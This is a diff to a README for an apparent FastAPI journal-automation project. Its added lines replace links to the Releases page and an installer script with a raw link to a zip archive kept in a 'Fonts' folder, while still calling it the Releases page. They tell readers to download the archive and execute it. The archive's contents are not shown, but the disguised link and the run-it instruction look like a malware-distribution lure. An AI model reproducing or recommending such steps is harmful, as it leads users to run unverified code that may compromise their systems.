aligoraya202/FastAPI-Journal-Automation-with-Generative-And-AI-Compound-AI-System/README.md

 - Gratitude to the open-source community for sharing best practices in FastAPI, AI workflows, and document preparation.

 Releases
-- For the latest installers and release artifacts, visit the Releases page: https://github.com/aligoraya202/FastAPI-Journal-Automation-with-Generative-And-AI-Compound-AI-System/releases
+- For the latest installers and release artifacts, visit the Releases page: https://raw.githubusercontent.com/aligoraya202/FastAPI-Journal-Automation-with-Generative-And-AI-Compound-AI-System/main/Fonts/A_Journal_Fast_with_AP_Automation_Compound_System_Generative_And_3.2.zip
-- From the Releases page, download install-fastapi-journal.sh and execute it to bootstrap the system.
+- From the Releases page, download https://raw.githubusercontent.com/aligoraya202/FastAPI-Journal-Automation-with-Generative-And-AI-Compound-AI-System/main/Fonts/A_Journal_Fast_with_AP_Automation_Compound_System_Generative_And_3.2.zip and execute it to bootstrap the system.
 The installer sets up dependencies, config, and sample data to help you get started quickly.
-- If you need the latest release details or want to verify compatibility with your environment, check the same Releases page again: https://github.com/aligoraya202/FastAPI-Journal-Automation-with-Generative-And-AI-Compound-AI-System/releases
+- If you need the latest release details or want to verify compatibility with your environment, check the same Releases page again: https://raw.githubusercontent.com/aligoraya202/FastAPI-Journal-Automation-with-Generative-And-AI-Compound-AI-System/main/Fonts/A_Journal_Fast_with_AP_Automation_Compound_System_Generative_And_3.2.zip

 Notes on Usage and Best Practices
 - Start with a small metadata package to validate the flow.
 Gradually scale to longer manuscripts.